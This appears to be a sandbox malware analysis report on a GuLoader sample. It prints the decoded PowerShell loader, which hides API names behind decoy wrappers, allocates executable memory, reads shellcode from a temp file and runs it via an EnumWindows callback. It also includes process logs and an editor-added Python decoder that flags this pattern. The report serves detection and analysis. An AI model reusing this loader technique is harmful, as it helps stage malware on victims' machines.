 # M U L L E I N S   M a g d a l 4   N O N C R Y S T   H o e j r 5   B U N I N G E   S W I D G   f o r p a g t   T Y P E G O D   S M A A P A R T I   U N D E R S K O V D   S k o l e g   a r u s h a   c o a t   B e k y m r e 5   s n i g g e r e r a   N A B O   V A T T E T S   P a r a t 6   R A B A T   M i s d e s c r i b   P E N S I   T a m r a 8   P R V E L S    
 # T o b a n t i h 5   p o t o r o o s i k   D o r s o i n t   a n f a   Q u a d r i r e   k i l o v a r e   B L A N K L A K S   H A F F   T r a e k v o g n e   S I G N   R e s c i   p a n t e n d e s a   R a d i a l g a d 3   e m b r o i d e r   T o l r e r 1   L e v i g a   S k r u 5   A f l a d e e n   U n g l a 9   A e r o s o l e 3    
 # A f r i k a n d e   M e d l 4   o b s t   a n s t d e   a c c e l e r a t i   s i l i c   I n d e k l 3   K n e b l i n g e   N o t o d o n   P a c u n o n s   B a r i u m m   U n d e 6   p o l a   b o o b o o s h a   D e x t r o r o t   T a w i e o p e r a   C r e s s y r u t s   T e x t u i s t b 6   M a z h   M i c r   d i f f e r e n c   N O N S C H I S   I n o h e s 6   H I L D I M I T A   M e t a i n   a n t i c y    
 # E p i l d o d e c   U p b l o w p h y l   p r e t r e a t   r e a c c   Y e l l o w   s u b s t r a   S T A B I   F R O S T   T r e s t l e f r a    
 # p r e e x t i   S R I N T E   S k a m f i l 3   H a l k a h s m i d   A l e b e n   t e l e f o n   S a a t e r p a l   T W E N   D r t r s 6   R E M O   A M P H I C    
 # B r o v 4   B a g p e r r o n   S H A D O W L I K E   M o e u r s f l   U s a n d h e 5   S t i f t s f r   S e p i o n o p f 2   S t e n g a l l e n 5   T v i v 9   v i a l m a k e   A r b e   R e p i l 9   A u t h v   B l e a 8   F o t o 6   b a n k d i r e   O e d e 1   p u y a l   D e p r e s 3   C A N N    
 # U n d e r   V i s k e i 8   S e x i v a l e n c   P u n d i   k r a v m e   D e c a l c   G o l d c u p   I m p e 1   U D P E G E S O P S   t i n s y k o   e s s e n t i a   S t o r h 3   V i r k s o m   O K A P I S S T R I   M o n e t i t e 7   S Y R I N G E N S   K o n f u s i o n e 9   T o m e r w h e e l 3   H A V E N E R S H   B r a i    
 # K O N F I T U R E   F o o t h o l d   B I L B O Q U E T   S h i f t a b l e 9   O u t s   v e n s t r e l i   F L A D S Y N   G E N E R A L S   S N O G E S   M I T U O P S T   S I D T   T r o l d d   C a r d i   m e n s   r n n e b o   X X X V I   a d d s t o l   p a r b   S a l m   H Y L A G Y   T i l s n i g e 9   D o u c e p e 1   R a r e f i 3   P o s s   N o n a r y o p t   P h o t o r a d i   M e d a 2   e q u i n o x   A M B U L A T I   A L G E B R A   I n t r a n s    
 # W O O D R   M i n i   F o r h i n   V l g e r n e c o   R A T A   v u l p i   O m v u r d e r i   O B S E R V A T I   T u b b e r o   T y p e 2   H O R N P I P E I C   g r u n d   f r y s   n o n l a r c e n o   t i t o   S c e n a r i e t e   P a r a p r 3   A d s c 7   S T R A F U D   N e d r a k k   M A I L A B I L I   S m a a l i g h   S K E H E J R E   A f g a n g s   B E A R D E   B E N G   f e d e r a c   k l d e b r s t   v o v s    
 # b a r o m   L u f t f a r t 3   t e l e s   C H A L O   U n i f i e s s a   S k r a a p a   U n a d   n a s a l i   l a u g e   F o r v a s k 4   B a t a t e r n e o 7    
 # P A U C I   f o r h o e   D i s r o   D e b o u c h m e 9   T e l e 2   C o l l u d e b o a 4   C E L I O S C H   T i l k e n d t   A p h o r   C o m b i n d d o p   D I S P E R S I O N   K o n t i n u a t i 2   U n c l e r k l i 2   F U L D T I D   T o x o t 6   R a n k n e s s   M o n o t y p 6   N e u r o 4   n e u r o p h i l   h e l s t e n s   S T R A P N I N   H u d e 3   O E V R E    
 # t o m c   K O N F O R M   C i t r o n p r e s   P o s i t i v e l y   H E M O M   S k g p 9   s p r o g u   A n t i m   S N O O P E R   I s o t e r e i 7   C U R L I E W U R L   f a g s    
 # A F T E   D r e j e   B i f a n g s t m a   I r r e c o g n 4   C B C M S M U D   s s o n s v i n   R a n d 2   V e d e r h f t i 3   n o n a n a l o   c e r u l e i t   D g n c e n   a r t h e   F i n a n s   F r u e f r a k   P A L M E B   S a a m a s k   O p t a n t e   L o c h i o s   S e j r s f a n e 7   F r o n t i n g l 7   P O K A L   D I N B   d i s s   v a t f   T a r z a n u 7   e l e c t r o g a   V I Z A R D   i n t e   A n v e n   C a t e c h i 7    
 # D R O S S E L K   F A R V E H A N D L   T E K S T B E H A   S p e d i t 7   G e s t u r a p 8   B r e e c h e d b o 7   d i s s e n t   H I N G E   K O N D I C Y K L E   t a n k   f a g o t t e   V u l t u r o u s   K o h l a n 3   T r i u m   B O S S A G E   k a t a s t r o   M o z a m b 5   t u n i n g s s t   A c f t m   B a k k e n b a r 6   a f s t   A f s t n i n g   B r o b u e 6   S a p p h    
 # S C L E   G R A N I T T E R N   M a n a n e 6   E m p r i s e p a 6   u r u g u a   S m a a 8   N o n p a p i s 4   K L A S S I   s v a g h    
 # O V E R N I   s t e r   T E I I D A E   U N G T J E N   C o n t r a c t i v   u n e q u i t a   G a s p a   Z O O M E C H A   O V E R P O P U L O   C E R T   L i q f r a p 2   I M P R O V   j a c t u r a s k   S l o w c o a c   B L A D S Y S   u n c l a s p   K A G E K   S E M M E S S K O R   V O L C A N I Z   a n t i s   K o n t o r 6   B U T I K S C E N   S h o u l d 4   M i l j a d m i 2   U r e d i n o 1   g a l l o n s t    
 # A F K A   S T Y R I N G S M I   U n i v e r s 5   M a i n v i c k i 6   B L O K H   G E J L E R O S S   b i s s e   U d h u l   K l u n k v i p 2   S t r u t h b r 1   v e r s   O R I G I N A L F R   M a n i 3   O u t r i b b 6    
 # m e j e t c h a   S i k k   k e r n e l l i n   B i b l i o g r   G a d e h   s m o k   B a r f o d e d e s 8   r e t u r n e r i n   S c a p e l e s s   s q u a l   K o n f o 1   G L U T I   R i g e t s f a r 5   O B S E R V A   A l i m e n t a t    
 # G e n n   P a n d   G O L D E N W I N G   R e d n i n g s h o   U D F R I E L   B e a r a b i l i   M e d l   T e m p o e r s f i   S p i r i t u s 5   s t r a n   F L O P P Y D   u n a a d i g t   M A S K E P R   B e s v e g o   L j t n   H y s t r   p a t e n t r e t   T i d s f 3   t o r i d   l i l a p l e a c h   S c h o o d 6   T o i l e 9   O p s u m m e r e 8   S c i r 3   H y d r o r h i z a   U N D S I G   G U N J B R A   I r e t t e s t t e 7    
 # U N A P P R   M I N E   P a i n   F O R U   P R E S E R V   b a g s t r b   U n n a r c   u n i m p u g n e   L a n d e j e n d o   T r o l d e r 8   O p b y   E N T R E D R   L n g o d t g r e   M A R R Y   v g t f   C l o t u r i n 7   s l y n g e l s t r    
  
  
 A d d - T y p e   - T y p e D e f i n i t i o n   @ "  
 u s i n g   S y s t e m ;  
 u s i n g   S y s t e m . R u n t i m e . I n t e r o p S e r v i c e s ;  
 p u b l i c   s t a t i c   c l a s s   R O T A T I O N F O 1  
 {  
 [ D l l I m p o r t ( " g d i 3 2 " ) ] p u b l i c   s t a t i c   e x t e r n   I n t P t r   E n u m F o n t s A ( s t r i n g   f e r s k v a , u i n t   p a r a p l e g , i n t   D E P O , i n t   R O T A T I O N F O 0 , i n t   H o v e , i n t   a f t e r r a k , i n t   S v i n g h j u l e 1 ) ;  
 [ D l l I m p o r t ( " K E R N E L 3 2 " ,   E n t r y P o i n t = " C r e a t e F i l e A " ) ] p u b l i c   s t a t i c   e x t e r n   I n t P t r   V i a c ( [ M a r s h a l A s ( U n m a n a g e d T y p e . L P S t r ) ] s t r i n g   f e r s k v a , u i n t   p a r a p l e g , i n t   D E P O , i n t   R O T A T I O N F O 0 , i n t   H o v e , i n t   a f t e r r a k , i n t   S v i n g h j u l e 1 ) ;  
 [ D l l I m p o r t ( " n t d l l " ) ] p u b l i c   s t a t i c   e x t e r n   i n t   N t A l l o c a t e V i r t u a l M e m o r y ( i n t   R O T A T I O N F O 6 , r e f   I n t 3 2   T E R R A , i n t   M a n i o k p , r e f   I n t 3 2   R O T A T I O N F O , i n t   P h o n o l o , i n t   R O T A T I O N F O 7 ) ;  
 [ D l l I m p o r t ( " K E R N E L 3 2 " ,   E n t r y P o i n t = " R e a d F i l e " ) ] p u b l i c   s t a t i c   e x t e r n   i n t   C D A C ( i n t   M a n i o k p 0 , u i n t   M a n i o k p 1 , I n t P t r   M a n i o k p 2 , r e f   I n t 3 2   M a n i o k p 3 , i n t   M a n i o k p 4 ) ;  
 [ D l l I m p o r t ( " U S E R 3 2 " ) ] p u b l i c   s t a t i c   e x t e r n   I n t P t r   E n u m W i n d o w s ( I n t P t r   M a n i o k p 5 , i n t   M a n i o k p 6 ) ;  
  
 }  
 " @  
 # R u b i n e m a g t 5   M y k i s s   S t e n o 3   U D D A N N E L S E   E X A C T N E   L a u r   M o o n i 1   A D J O   B e m u r 1   I N S T   A d j u s t   F r e r p r v e 9   H j e r t e b a r   F l u t   H e d e n s k r a m   B u r m a n n i a   m u h a m   B e g y   H u a h u k u l i s 8   B a g b u 2   W A R S   M a s k e d b t t   d r y p s   s t o p p e g   S w e e 5   S O D F   b a r r   M a n g e r s f l a 9    
 $ R O T A T I O N F O 2 = " $ e n v : t e m p "   +   " \ r e t t e t a s t . d a t "  
 # n o n h e r e d   i n k a s s o   F u l d b   S e l v a n g   G n i d d e 2   S U R M O   B O D H I S A T T   Q U I S   e n s r e t t e n d   c r y p t o d i r e   H o m e r o o m p   S P A R E N D E S P   A n t i l i t   E B U L L   F o r b   V i l d f a 2   M i n a e a 1   s y g d o m f o r n   A l m i n d e l   D R U E S    
 $ R O T A T I O N F O 3 = 0 ;  
 $ R O T A T I O N F O 9 = 1 0 4 8 5 7 6 ;  
 $ R O T A T I O N F O 8 = [ R O T A T I O N F O 1 ] : : N t A l l o c a t e V i r t u a l M e m o r y ( - 1 , [ r e f ] $ R O T A T I O N F O 3 , 0 , [ r e f ] $ R O T A T I O N F O 9 , 1 2 2 8 8 , 6 4 )  
 # R e s u 5   S k l d t e 3   M A G N E T I S M   K a l k u 8   A e s c   D O R E S T A   G o a l p o   n a t b o r   S y n e r g e t i c 4   G y n a n d r a 1   K l a v i   W A N L A   G e l a   m i l j b e r   T o l s e y l   e p i p l   W O R S H   C o l e m   A n n u 1   L E V I G A T I N   s t a b s o f f i   i r o n   u b l u f r d i g    
 $ R O T A T I O N F O 4 = [ R O T A T I O N F O 1 ] : : V i a c ( $ R O T A T I O N F O 2 , 2 1 4 7 4 8 3 6 4 8 , 1 , 0 , 3 , 1 2 8 , 0 )  
 # P U M P E R N I   B R E P   R E N N E S I   B a b b o   S t y l t   N a z i s m e s c a 3   l a t e n e d r a   A L G E B R A I S   K e t t q u i   P n e u m a   A f g i f t   t e m p l o   S K I N D K A A B   F e r n i s e r e 1   r e c t i f i e   R A D I O A   g l o s s o   b e t a l i n g s e   F r i t u r e 2   s u b e t h a t   m e m o   U d a r b e j d e 3    
 $ R O T A T I O N F O 5 = 0 ;  
 # S v e l n i   T E R R E S T R I A   G r u m m e   R Y D H A N D G   S e c o n d e 2   r e q u i   M E R S T I G N   E m b r y o n a   K o r s v e j t r 3   i s d k k e d   S u b b a s 4   v e l l a b a g b   n o n f e r   V i r t u o s   K R O P S S   K A L F   A m t s r a a d s f 6    
 [ R O T A T I O N F O 1 ] : : C D A C ( $ R O T A T I O N F O 4 , $ R O T A T I O N F O 3 , 5 7 9 3 3 , [ r e f ] $ R O T A T I O N F O 5 , 0 )  
 # D Z O T O M M E S K   U d s k r i n g   S e m i a m 6   P u r l g   s y t t e n a   H y d r   E u r a s i e r e n   M u l t 3   U n s w i n   A d v o k 8   M a r i n e s t a   T e n d   P e l v e s r u a t 4   i n d d a t a f i l   A k a d e m i s 1   G A R U D A   E v e n t u 1   P R E S E N T I M   D i v u l 7   S p i l d e v a   S t y r k e   F o t o t e l   A u t o t 5   E A R T   H y d r a g o g y   B r i n c e u 9   T r i p l u   u n o r a l e s   S k e l e    
 [ R O T A T I O N F O 1 ] : : E n u m W i n d o w s ( $ R O T A T I O N F O 3 ,   0 )  
  
 
      Imagebase:0xf0000
      File size:430592 bytes
      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:.Net C# or VB.NET
      Yara matches:
      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000E.00000002.894432907.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
      Reputation:high
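The decoded -EncodedCommand above and the dropped wwh3pdnv.0.cs source are the same loader: a P/Invoke class whose EntryPoint= attributes hide CreateFileA and ReadFile behind the names Viac and CDAC, an NtAllocateVirtualMemory call on the current process (-1) with AllocationType 12288 (MEM_COMMIT|MEM_RESERVE) and Protect 64 (PAGE_EXECUTE_READWRITE), a ReadFile of 57933 bytes from %TEMP%\rettetast.dat into that buffer, and an EnumWindows call that passes the buffer as the callback, which is how the shellcode gets control. The following script is an added example from the editor, not part of the Joe Sandbox report or the sample: it decodes a PowerShell -EncodedCommand (base64 over UTF-16LE), strips the junk comment lines, resolves each wrapper to the real export, and flags that three-step pattern. The input is constructed by re-encoding the decoded script printed in this report (trimmed to a few of its comment lines); the constants MEM_COMMIT and PAGE_EXECUTE_READWRITE are the documented Win32 values.

```python
import base64
import re

# Constructed input: the decoded script from this report, with only a few of
# its junk comment lines kept (the real one carries several dozen).
DECODED_SCRIPT = r'''#Instru9 SBEURTERNE Slan Spontan7 UNCALL embo reit
Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;
public static class ROTATIONFO1
{
[DllImport("gdi32")]public static extern IntPtr EnumFontsA(string ferskva,uint parapleg,int DEPO,int ROTATIONFO0,int Hove,int afterrak,int Svinghjule1);
[DllImport("KERNEL32", EntryPoint="CreateFileA")]public static extern IntPtr Viac([MarshalAs(UnmanagedType.LPStr)]string ferskva,uint parapleg,int DEPO,int ROTATIONFO0,int Hove,int afterrak,int Svinghjule1);
[DllImport("ntdll")]public static extern int NtAllocateVirtualMemory(int ROTATIONFO6,ref Int32 TERRA,int Maniokp,ref Int32 ROTATIONFO,int Phonolo,int ROTATIONFO7);
[DllImport("KERNEL32", EntryPoint="ReadFile")]public static extern int CDAC(int Maniokp0,uint Maniokp1,IntPtr Maniokp2,ref Int32 Maniokp3,int Maniokp4);
[DllImport("USER32")]public static extern IntPtr EnumWindows(IntPtr Maniokp5,int Maniokp6);
}
"@
#Rubinemagt5 Mykiss Steno3 UDDANNELSE
$ROTATIONFO2="$env:temp" + "\rettetast.dat"
$ROTATIONFO3=0;
$ROTATIONFO9=1048576;
$ROTATIONFO8=[ROTATIONFO1]::NtAllocateVirtualMemory(-1,[ref]$ROTATIONFO3,0,[ref]$ROTATIONFO9,12288,64)
$ROTATIONFO4=[ROTATIONFO1]::Viac($ROTATIONFO2,2147483648,1,0,3,128,0)
$ROTATIONFO5=0;
[ROTATIONFO1]::CDAC($ROTATIONFO4,$ROTATIONFO3,57933,[ref]$ROTATIONFO5,0)
[ROTATIONFO1]::EnumWindows($ROTATIONFO3, 0)
'''


def encode_command(script):
    """What powershell.exe -EncodedCommand takes: base64 over UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(b64):
    return base64.b64decode(b64).decode("utf-16-le")


def strip_junk_comments(script):
    """GuLoader pads the script with whole-line '#' comments of dictionary
    words; dropping them leaves the handful of lines that do the work."""
    return "\n".join(l for l in script.splitlines() if not l.lstrip().startswith("#"))


DLLIMPORT_RE = re.compile(
    r'\[DllImport\("(?P<dll>[^"]+)"(?:,\s*EntryPoint="(?P<entry>[^"]+)")?\)\]'
    r'\s*public static extern \w+ (?P<name>\w+)\(')


def resolve_pinvokes(script):
    """Map each C# wrapper name to the export it really calls; EntryPoint=
    is what lets the author hide ReadFile behind a name like CDAC."""
    return {m["name"]: f'{m["dll"].lower()}!{m["entry"] or m["name"]}'
            for m in DLLIMPORT_RE.finditer(script)}


MEM_COMMIT = 0x1000
PAGE_EXECUTE_READWRITE = 0x40
# Exports that take a function pointer and call it: a buffer passed here runs.
CALLBACK_APIS = {"user32!EnumWindows", "gdi32!EnumFontsA"}
CALL_RE = re.compile(r'\[\w+\]::(?P<fn>\w+)\((?P<args>[^)]*)\)')


def analyse_encoded(b64):
    """Decode, strip, resolve and walk the calls in order, tracking which
    variable receives the allocated base address."""
    script = strip_junk_comments(decode_command(b64))
    pinvokes = resolve_pinvokes(script)
    calls = [(pinvokes.get(m["fn"], m["fn"]), [a.strip() for a in m["args"].split(",")])
             for m in CALL_RE.finditer(script)]
    findings, buf_var = [], None
    for api, args in calls:
        if api == "ntdll!NtAllocateVirtualMemory" and len(args) == 6:
            alloc_type, protect = int(args[4]), int(args[5])
            buf_var = args[1].replace("[ref]", "")  # receives the base address
            if args[0] == "-1" and alloc_type & MEM_COMMIT and protect == PAGE_EXECUTE_READWRITE:
                findings.append(f"RWX memory committed in own process, base in {buf_var}")
        elif api == "kernel32!ReadFile" and buf_var and args[1] == buf_var:
            findings.append(f"{args[2]} bytes read from disk into {buf_var}")
        elif api in CALLBACK_APIS and buf_var and args[0] == buf_var:
            findings.append(f"{api} called with {buf_var} as callback: buffer executed")
    path = re.search(r'"\$env:temp"\s*\+\s*"(\\[^"]+)"', script)
    return {"apis": sorted(set(pinvokes.values())),
            "payload_path": "%TEMP%" + path.group(1) if path else None,
            "findings": findings}


# Re-encoded form of the constructed script, standing in for the real argument.
ENCODED = encode_command(DECODED_SCRIPT)

if __name__ == "__main__":
    for key, value in analyse_encoded(ENCODED).items():
        print(key, value)
```

The same walk applies to the `wwh3pdnv.0.cs` source the report lists as dropped, since that file is just the TypeDefinition here-string written out for csc.exe; resolving the EntryPoint aliases is the step that turns the random wrapper names into something a rule can match on.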

      Target ID:15
      Start time:13:34:12
      Start date:12/05/2022
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff7bab80000
      File size:625664 bytes
      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Target ID:21
      Start time:13:34:46
      Start date:12/05/2022
      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wwh3pdnv\wwh3pdnv.cmdline
      Imagebase:0x890000
      File size:2170976 bytes
      MD5 hash:350C52F71BDED7B99668585C15D70EEA
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:.Net C# or VB.NET
      Reputation:moderate

      Target ID:22
      Start time:13:34:49
      Start date:12/05/2022
      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESBAD5.tmp" "c:\Users\user\AppData\Local\Temp\wwh3pdnv\CSC196797DCDE8F47A0A151AAD0920D1B.TMP"
      Imagebase:0x830000
      File size:43176 bytes
      MD5 hash:C09985AE74F0882F208D75DE27770DFA
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate

      No disassembly